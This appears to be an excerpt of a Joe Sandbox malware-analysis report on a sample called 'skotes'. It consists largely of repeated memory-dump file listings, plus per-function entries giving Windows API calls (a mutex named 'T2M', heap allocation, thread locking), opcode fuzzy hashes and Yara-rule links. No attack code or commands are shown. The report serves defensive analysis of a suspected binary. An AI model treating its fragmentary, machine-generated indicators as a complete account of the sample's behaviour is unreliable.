Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2M
API String ID: 1464230837-1911109154
Opcode ID: 0b4ba8b73e6065c6ab4cb87b3eda228eb216c1a32cfce3e6349492311bee48a6
Instruction ID: 66518395767d0fec7a92440fc126681aab31c9c0d99db54d9e3f63fbff35f130
Opcode Fuzzy Hash: 0b4ba8b73e6065c6ab4cb87b3eda228eb216c1a32cfce3e6349492311bee48a6
Instruction Fuzzy Hash: 04213870649201CAEB287779988ABAEB3529FC1304F25881FE14C963C2CB7E4851825F

Function 0047A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0047A963
CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981

Strings

T2M, xrefs: 0047A970

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2M
API String ID: 1464230837-1911109154
Opcode ID: dcfefdc37c410e699c1a3adfb3a5e90734e5a8aa54f55baa6f2ed672e97b1979
Instruction ID: fbae6c50dd06feb00a48de2ecd221e27f9b188c9bf008e9e7c02e148f4447656
Opcode Fuzzy Hash: dcfefdc37c410e699c1a3adfb3a5e90734e5a8aa54f55baa6f2ed672e97b1979
Instruction Fuzzy Hash: 25216A717042019BEB189F28EC897ADB762DBD6311F248A1FE40C977D1C77E95A0871A

Function 004AD82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004AA813,00000001,00000364,00000006,000000FF,?,004AEE3F,?,00000004,00000000,?,?), ref: 004AD870

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6ada836cd9fc5f3533901b89ca663c5a820016bbfc112b88dc6696245590a2e7
Instruction ID: 392a6dd2fa84db1492ebcb90e419adc8ab7475ef940ac0a7c7114287860a944c
Opcode Fuzzy Hash: 6ada836cd9fc5f3533901b89ca663c5a820016bbfc112b88dc6696245590a2e7
Instruction Fuzzy Hash: F0F0E972E4512466EB213A739C01A5B3759DF737B0B15802FEC2AA7A91DA2CEC0181E9

Non-executed Functions

Function 00472EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00472F5F
GetCurrentThreadId.KERNEL32 ref: 00472F7E
__Mtx_unlock.LIBCPMT ref: 00472FCC
__Cnd_broadcast.LIBCPMT ref: 00472FE3
__Mtx_unlock.LIBCPMT ref: 004730F5
GetCurrentThreadId.KERNEL32 ref: 00473132
__Mtx_unlock.LIBCPMT ref: 0047319B

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 3a685fd12f452c66a0821da95456c069517b0af18dd6eef546e33561ce955c1b
Instruction ID: c9939a31456e5df7b4cef7da24ec50ac9bf37f303336147a4b98d8f7d8c07654
Opcode Fuzzy Hash: 3a685fd12f452c66a0821da95456c069517b0af18dd6eef546e33561ce955c1b
Instruction Fuzzy Hash: 9EA1F170A012459FDB20EF65C944B9BB7A8FF14315F04856FE809D7381EB39EA04DBA9

Function 004ACBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004ACC66

Strings

vJ, xrefs: 004ACBE1

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: vJ
API String ID: 3213747228-190702178
Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction ID: 56daa811097e1f2e94d492957541666e5f85402896b33f7f032b7f44b67f54e2
Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction Fuzzy Hash: EFB1F2329042459FDB158F28C8C17AFBBE5EF66354F14816BD855EB341D6389D02CBA8

Function 0048BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0048BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0048BBE4
_xtime_get.LIBCPMT ref: 0048BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0048BC13

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
